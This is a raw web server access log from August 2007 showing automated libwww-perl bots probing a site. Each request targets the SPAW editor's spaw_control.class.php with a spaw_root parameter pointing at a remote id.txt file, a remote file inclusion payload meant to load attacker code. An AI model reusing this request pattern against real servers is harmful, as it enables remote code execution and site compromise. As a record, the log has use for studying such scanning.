81.17.72.133 - - [26/Aug/2007:16:45:30 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.17.72.133 - - [26/Aug/2007:16:45:45 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.17.72.133 - - [26/Aug/2007:16:45:45 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.17.72.133 - - [26/Aug/2007:16:45:46 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.246.99.64 - - [26/Aug/2007:16:45:58 -0700] "GET /logs/access.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.17.72.133 - - [26/Aug/2007:16:45:59 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.17.72.133 - - [26/Aug/2007:16:46:00 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.17.72.133 - - [26/Aug/2007:16:46:00 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.246.99.64 - - [26/Aug/2007:16:46:00 -0700] "GET /logs/access.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.99.64 - - [26/Aug/2007:16:46:01 -0700] "GET /logs/access.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.117.160.103 - - [26/Aug/2007:16:46:23 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.117.160.103 - - [26/Aug/2007:16:46:24 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.86.82.38 - - [26/Aug/2007:16:46:27 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.86.82.38 - - [26/Aug/2007:16:46:28 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.135.48.42 - - [26/Aug/2007:16:46:43 -0700] "GET /logs/access_070716.log/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.48.42 - - [26/Aug/2007:16:46:43 -0700] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.48.42 - - [26/Aug/2007:16:46:43 -0700] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoprotech.co.uk/sohoadmin/program/modules/mods_full/shopping_cart/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org